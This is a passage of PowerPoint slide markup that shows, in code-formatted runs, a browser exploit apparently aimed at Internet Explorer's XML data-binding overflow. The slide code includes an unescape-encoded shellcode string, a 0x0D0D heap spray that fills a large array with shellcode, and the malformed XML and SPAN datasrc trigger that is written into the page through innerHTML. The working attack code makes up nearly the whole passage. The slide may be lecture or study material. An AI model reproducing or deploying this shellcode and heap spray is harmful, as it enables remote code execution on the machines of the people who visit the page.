                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b" + '</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                         "%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac" + '</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                         "%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b" + '</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                         "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040" + '</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                         "%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233" + '</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                         "%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89" + '</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                         "%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab" + '</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                         "%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934" + '</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                         "%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%uee77%uccfe%u8950" + '</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                         "%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650" + '</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                         "%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347" + '</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                         "%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1" + '</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                         "%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353" + '</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                         "%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b" + '</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                         "%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048" +'</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                         "%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0" + '</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                         "%ufec2%uffff%uc483%u615c%u89eb");'</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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> block = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("%u0D0D%u0D0D");'</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'while (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>block.length</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt; 100000) block += block;'</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rgbClr val="000000"/>
                </a:solidFill>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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> memory = new Array();'</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rgbClr val="000000"/>
                </a:solidFill>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'for (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0;i &lt; 1000;i++) memory[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] += block + shellcode;'</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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xmlrox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "&lt;XML id=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>microosuck</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;vista&gt;&lt;![CDATA[&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=http://&amp;#x0a0a;&amp;#x0a0a;.microo.suck&gt;]]&gt;&lt;/vista&gt;&lt;/ie&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B06090202040302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rgbClr val="0000FF"/>
                </a:solidFill>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&lt;/XML&gt;&lt;SPAN </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datasrc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=#</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>microosuck</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datafld</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=vista </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dataformatas</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=html&gt;'</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'&lt;XML id=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>microosuck</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/XML&gt;&lt;SPAN </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datasrc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=#</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>microosuck</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>datafld</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=vista </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dataformatas</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=html&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;";'</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"\n\n</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       '</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mssox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msie_xmlbof_vista</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");' . </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="14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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mssox.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xmlrox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;'</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'&lt;/script&gt;'</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"\n"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'&lt;/html&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
